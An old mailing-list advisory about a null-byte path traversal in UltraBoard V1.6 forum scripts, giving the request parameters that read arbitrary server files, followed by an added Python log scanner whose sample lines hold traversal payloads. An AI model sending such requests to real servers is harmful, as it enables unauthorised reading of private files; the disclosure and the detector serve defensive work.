Subject: Fun with UltraBoard V1.6X
From: rudi carell (rudicarell HOTMAIL.COM)
Date: Wed May 03 2000 - 04:13:16 CDT
hola friends,
found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)
class: Input Validation Error
remote: Yes
vulnerable: UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com
Description:
By using the good old NullByte (\000) it's possible to open "any" file on the
webserver (with its permissions) running the "UltraBoard" forum-software.
cgi-script:
UltraBoard.pl || UltraBoard.cgi
Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=
hmm ... EOF
nizedays,
rudic
rudicarell
hotmail.com
<dream>"getrootallthetime"</dream>
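
Added example, not part of the original post and not UltraBoard code: a check a defender could run over web-server access logs to flag requests matching the pattern described above (a `Post` value carrying a NUL byte or `..` segments, sent to UltraBoard.pl or UltraBoard.cgi). The Common Log Format layout, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a Common Log Format line: "METHOD target HTTP/x.y" (assumed layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(r'/UltraBoard\.(?:pl|cgi)$', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2500 -> %00 -> NUL)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the set of findings for one access-log line (empty if clean)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return set()
    target = urlsplit(match.group(1))
    if not SCRIPT_RE.search(target.path):
        return set()
    findings = set()
    # parse_qsl removes one encoding layer; fully_decode removes any others.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "Post":
            continue
        value = fully_decode(value)
        if "\x00" in value:
            findings.add("nul-byte")
        # Only the part before the NUL reaches the file-open call.
        seen_by_open = value.split("\x00", 1)[0].replace("\\", "/")
        if ".." in seen_by_open.split("/"):
            findings.add("dot-dot")
    return findings

# Constructed sample lines (documentation addresses, placeholder file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2000:04:20:01 -0500] "GET /cgi-bin/UltraBoard.pl?Action=PrintableTopic&Post=12&Board=general&Idle=10 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [03/May/2000:04:21:44 -0500] "GET /cgi-bin/UltraBoard.cgi?Action=PrintableTopic&Post=../../placeholder.txt%00&Board=general HTTP/1.0" 200 734',
    '192.0.2.77 - - [03/May/2000:04:21:59 -0500] "GET /cgi-bin/UltraBoard.pl?Action=PrintableTopic&Post=%252e%252e%5Cplaceholder.txt%2500&Board=general HTTP/1.0" 200 734',
    '192.0.2.10 - - [03/May/2000:04:22:10 -0500] "GET /index.html?Post=..%00 HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, start=1):
        hits = classify(line)
        if hits:
            print(f"line {number}: {sorted(hits)}")
```

Access logs record only the query string, so the same parameters sent in a POST body would need request-body logging to be seen.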